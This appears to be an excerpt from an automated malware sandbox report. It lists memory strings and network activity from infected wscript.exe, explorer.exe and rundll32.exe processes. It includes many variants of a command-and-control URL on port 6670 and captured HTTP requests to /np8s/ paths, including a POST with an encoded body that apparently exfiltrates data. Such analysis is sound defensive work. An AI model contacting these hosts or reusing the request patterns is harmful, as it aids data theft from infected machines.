Source: wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre2
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre4
Source: wscript.exe, 00000005.00000003.919796248.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921500706.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755644912.000002CA03755000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.937481985.0000019175C88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773445797.0000019175C51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938372471.0000019175C8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.774215223.0000019175C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.937512517.0000019175C5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.973084193.000002A0FE3BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797669252.000002A0FE3BB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798581012.000002A0FE39B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796772281.000002A0FE3B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797946340.000002A0FE38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796252633.000002A0FE3B0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-100
Source: wscript.exe, 00000002.00000003.895989838.0000015597AB9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre63209-4053062332-1000
Source: wscript.exe, 00000009.00000003.795747446.000002A0FE3C4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre9
Source: wscript.exe, 00000009.00000003.798741707.000002A0FE393000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797946340.000002A0FE38D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798562853.000002A0FE392000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrecomputerNUMBER_OF_H
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQppZiAo
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreDQpyZXR1
Source: wscript.exe, 00000002.00000003.896542475.0000015597A95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.896087228.0000015597A8A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreG
Source: wscript.exe, 00000009.00000002.955051076.000002A0FC2F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreG1C
Source: wscript.exe, 00000007.00000003.773058007.0000019175C95000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreHGG
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreI
Source: wscript.exe, 00000007.00000003.774092404.0000019175C88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773130942.0000019175C83000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreITL
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrr
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKS5yZXBsrrm
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreKTsNClZO
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.959396798.0000015595552000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961147065.0000019173A2A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.799097708.000002A0FC3C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798949584.000002A0FC3BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966615187.000002A0FC3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM
Source: wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreM:
Source: wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMF
Source: wscript.exe, 00000009.00000002.972932842.000002A0FE300000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMpN
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMs&
Source: wscript.exe, 00000002.00000003.896415401.0000015597A51000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreMw
Source: wscript.exe, 00000005.00000003.754939043.000002CA057A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.964582567.000002CA03739000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreP
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrePSAiQ2wi
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreR
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreXGxvY2Fs
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZXBsYWNl
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreZigpIHsNrrJ
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.d
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duu
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duuJ
Source: wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreadkhan.duum
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrebWcgPSAi
Source: wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VredmFyIGN0
Source: wscript.exe, 00000007.00000003.938446628.0000019173A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938737820.0000019173A76000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938565002.0000019173A64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938264988.0000019173A54000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961784713.0000019173A77000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938676812.0000019173A67000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreeX9
Source: wscript.exe, 00000002.00000002.978866316.0000015597A7D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrei
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrel
Source: wscript.exe, 00000005.00000003.919362750.000002CA03732000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.920503026.000002CA0373B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VrentWW
Source: wscript.exe, 00000002.00000002.961961202.0000015597A20000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.774305004.0000019173A76000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2
Source: wscript.exe, 00000005.00000003.755644912.000002CA03755000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755692263.000002CA0376A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter22
Source: wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrenter2Pac
Source: wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreo
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/VreoX&B
Source: wscript.exe, 00000005.00000003.755185989.000002CA0572D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreoft.XMLHTTPll
Source: wscript.exe, 00000009.00000003.799097708.000002A0FC3C2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.798949584.000002A0FC3BA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vreox
Source: wscript.exe, 00000009.00000003.796829092.000002A0FC3A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000003.797967352.000002A0FC3D3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrep
Source: wscript.exe, 00000005.00000003.919796248.000002CA03757000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921213700.000002CA0376A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrer:
Source: wscript.exe, 00000002.00000002.961660167.0000015597430000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.995617824.000002CA05530000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.961947849.0000019175800000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000009.00000002.966667032.000002A0FDD80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vres2
Source: wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vret
Source: wscript.exe, 00000009.00000002.973024572.000002A0FE375000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrets
Source: wscript.exe, 00000005.00000002.964582567.000002CA03739000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrew
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vrext10
Source: wscript.exe, 00000007.00000002.973441987.0000019175C0F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://dilshadkhan.duia.ro:6670/Vre~
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehp
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/?ocid=iehpHg9s
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.msn.com/de-ch/?ocid=iehpr2
Source: rundll32.exe, 0000000D.00000002.1037944488.000000000505B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ratebill.com
Source: rundll32.exe, 0000000D.00000002.1037944488.000000000505B000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://www.ratebill.com/np8s/
Source: explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=4842492154761;g
Source: explorer.exe, 00000004.00000000.511552982.000000000813C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=58648497779
Source: explorer.exe, 00000004.00000000.477200448.00000000081D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.537643218.00000000081D3000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=3931852
Source: explorer.exe, 00000004.00000000.476914061.000000000818D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gt
Source: explorer.exe, 00000004.00000000.537134730.000000000813C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.537519128.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.476053409.000000000813C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.512260933.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.476914061.000000000818D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.511552982.000000000813C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=5864849777998;gtm=
Source: explorer.exe, 00000004.00000000.476577870.0000000008172000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.536743740.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.510215126.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1LMEM
Source: explorer.exe, 00000004.00000000.517717240.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.474624274.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540526960.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.572487291.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
Source: explorer.exe, 00000004.00000000.517717240.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540526960.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.572487291.000000000E01D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478971428.000000000E01D000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1H
Source: explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.487873413.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1LMEM
Source: wscript.exe, 00000002.00000003.896415401.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000003.703701326.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000002.00000002.970059033.0000015597A51000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.921517592.000002CA056E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000003.755001537.000002CA056FB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000005.00000002.999768148.000002CA056E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773742708.0000019175BED000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000002.962073296.0000019175BB8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.938835842.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000007.00000003.773589121.0000019175BB7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: explorer.exe, 00000004.00000000.476577870.0000000008172000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1601451842&rver=6.0.5286.0&wp=MBI_SSL&wre
Source: explorer.exe, 00000004.00000000.536624812.0000000007FFF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/common/oauth2/authorize?client_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/whois
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domainnameshop.com/whois?currency=SEK&lang=sv
Source: rundll32.exe, 0000000D.00000002.1035473126.00000000049E2000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: https://www.domeneshop.no/whois
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/
Source: explorer.exe, 00000004.00000000.517507891.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.478929782.000000000DFF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.540379994.000000000DFC1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/92
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/iehposignin141sntEs
Source: explorer.exe, 00000004.00000000.475095108.0000000008044000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.475980973.000000000811E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/static/images/favicons/favicon-16x16.png
Source: explorer.exe, 00000004.00000000.614262773.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.614755248.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.524881667.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.524457764.0000000000E38000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.488060173.0000000000F04000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.487873413.0000000000E38000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0
Source: explorer.exe, 00000004.00000000.488060173.0000000000F04000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0m
Source: explorer.exe, 00000004.00000000.474624274.0000000007EF6000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrowser=0ytFd.
Source: unknown HTTP traffic detected: POST /np8s/ HTTP/1.1Host: www.jlbwaterdamagerepairseattle.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.jlbwaterdamagerepairseattle.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.jlbwaterdamagerepairseattle.com/np8s/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 7a 56 42 3d 53 39 54 57 7a 6a 54 34 6d 34 78 55 56 49 6a 61 73 47 34 71 30 72 6c 77 6d 4a 77 72 34 4a 34 34 74 39 4d 76 34 4b 57 39 74 39 4e 74 79 31 52 38 31 78 74 34 39 46 58 46 37 45 76 32 70 58 42 30 28 41 74 37 69 4b 36 71 49 56 6d 76 39 73 4d 53 73 6e 41 6f 70 2d 56 39 53 42 76 38 56 6d 62 59 35 51 63 55 28 2d 69 69 4b 52 56 62 47 6c 51 6d 4e 68 38 31 4d 4d 43 69 4e 57 39 79 63 45 66 74 49 6e 7e 31 6a 7a 49 58 69 73 76 52 77 69 42 55 49 35 61 67 4c 73 65 51 42 38 72 6d 32 74 66 31 4e 69 62 63 33 2d 4a 73 33 76 37 70 36 4e 43 2d 4f 33 37 67 69 6f 54 58 5a 53 5a 55 7a 5a 35 4e 75 72 72 74 39 4e 31 73 6d 52 32 7a 49 38 44 31 4b 4d 46 31 6f 44 4b 4a 42 6f 54 76 7e 31 70 57 45 35 37 32 42 6e 58 79 67 69 79 73 53 50 4e 42 54 5f 6b 43 6d 51 55 37 54 7a 79 6d 69 47 4c 79 7a 36 76 2d 77 38 52 5f 69 64 4b 54 6f 4e 36 4d 6f 5f 45 32 33 4c 50 4e 31 62 47 73 58 4d 4e 6b 4f 50 67 57 32 69 6a 6c 70 51 77 2d 6e 50 39 51 36 48 68 72 63 50 77 6f 53 41 71 74 6f 37 62 64 44 71 56 50 35 74 30 49 6b 56 67 31 41 36 48 4d 73 7a 59 6d 55 38 4a 66 30 43 66 38 52 59 6e 76 64 62 6a 78 47 77 72 4b 41 6b 49 7a 6f 6b 41 6f 4c 6d 39 59 49 34 67 5f 4c 79 41 34 76 4f 55 52 39 4f 75 58 44 32 7a 79 53 51 78 4a 46 47 6d 48 73 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: zVB=S9TWzjT4m4xUVIjasG4q0rlwmJwr4J44t9Mv4KW9t9Nty1R81xt49FXF7Ev2pXB0(At7iK6qIVmv9sMSsnAop-V9SBv8VmbY5QcU(-iiKRVbGlQmNh81MMCiNW9ycEftIn~1jzIXisvRwiBUI5agLseQB8rm2tf1Nibc3-Js3v7p6NC-O37gioTXZSZUzZ5Nurrt9N1smR2zI8D1KMF1oDKJBoTv~1pWE572BnXygiysSPNBT_kCmQU7TzymiGLyz6v-w8R_idKToN6Mo_E23LPN1bGsXMNkOPgW2ijlpQw-nP9Q6HhrcPwoSAqto7bdDqVP5t0IkVg1A6HMszYmU8Jf0Cf8RYnvdbjxGwrKAkIzokAoLm9YI4g_LyA4vOUR9OuXD2zySQxJFGmHsg).
Source: unknown DNS traffic detected: queries for: dilshadkhan.duia.ro
Source: global traffic HTTP traffic detected: GET /np8s/?4hM4=o4B0f&zVB=pvCvVC1srqMzTu3vjZ/Pi4S7puQ7WYlroZs2vwEH9SE4BkgUF4SEMyF7Qq3EYWraDKw9 HTTP/1.1Host: www.rasheedabossmoves.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
